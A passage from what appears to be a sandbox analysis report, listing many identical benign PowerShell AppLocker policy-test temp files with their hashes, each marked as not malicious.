                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k00pwkba.k05.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k2fy1nq5.cmh.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kj14smxd.guv.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkkoqns5.lu2.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kpbdxsy5.zmf.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kyoc3ssq.ccz.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3dgvxnj.ymi.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1p5ag5g.swd.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkjuxivc.304.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nc1w3ogc.e4n.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nv2pdsp3.ywj.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_occwupoq.uzz.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_og1immaz.3f4.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p2o21jnw.btc.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbyjw43h.nru.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qj2qxe0c.e2y.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qniehsps.zlg.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qwai5stc.4rn.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rb5alkih.xq2.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkmcausp.pwu.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rndclrbn.w5g.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rrodlzqo.hrf.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjierbs4.0l5.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2ov5u0l.twf.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u03e4l04.0vc.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
